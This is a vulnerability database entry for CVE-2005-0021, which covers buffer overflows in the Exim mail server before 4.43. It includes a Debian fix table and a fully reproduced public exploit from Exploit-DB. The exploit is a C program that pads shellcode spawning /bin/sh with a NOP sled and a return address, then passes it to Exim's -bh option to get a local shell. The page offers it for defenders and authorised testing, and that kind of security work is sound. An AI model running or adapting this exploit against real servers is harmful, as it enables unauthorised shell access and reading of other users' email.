CVE-2005-0021
Description
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Exim 4.41 - 'dns_build_reverse' Local Read Emails
/*
* ripped straight off iDEFENSE advisory - so lazy I just picked
* up GDB... bored on a weeknight :(
*
* nothing to write home to mother about due to the fact that
* you need a local user account on a server and all you
* get is to read other people's emails ....
*
* not even my own shellcode. aleph1 shellcode - cut and paste job
* with nops to pad.
*
* Regards,
* Plugger aka Tony Lockett
*
*
*
*/
char bomb[288]=
/* the gear from iDEFENSE */
"::%A:::::::::::::::::" /* 21 bytes */
/* -------- */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90" /* 218 bytes */
/* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" /* 12 bytes */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" /* 12 bytes */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" /* 9 bytes */
"\xe8\xdc\xff\xff\xff/bin/sh" /* 12 bytes */
/* where EIP should point */
"\xf4\xf2\xff\xbf"; /* 4 bytes */
/* -------- */
/* 49 bytes */
/* -------- */
/* 288 bytes */
/* ========= */
main()
{
char *exim[4];
exim[0] = "/usr/exim/bin/exim";
exim[1] = "-bh";
exim[2] = bomb;
exim[3] = 0x0;
printf("Firing up exim - cross your fingers for shell!\n");
execve(exim[0],exim,0x0);
return;
}
// milw0rm.com [2005-05-25]Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 4.34-10 |
| sid | Fixed | 4.34-10 |
| forky | Fixed | 4.34-10 |
| bullseye | Fixed | 4.34-10 |
| bookworm | Fixed | 4.34-10 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.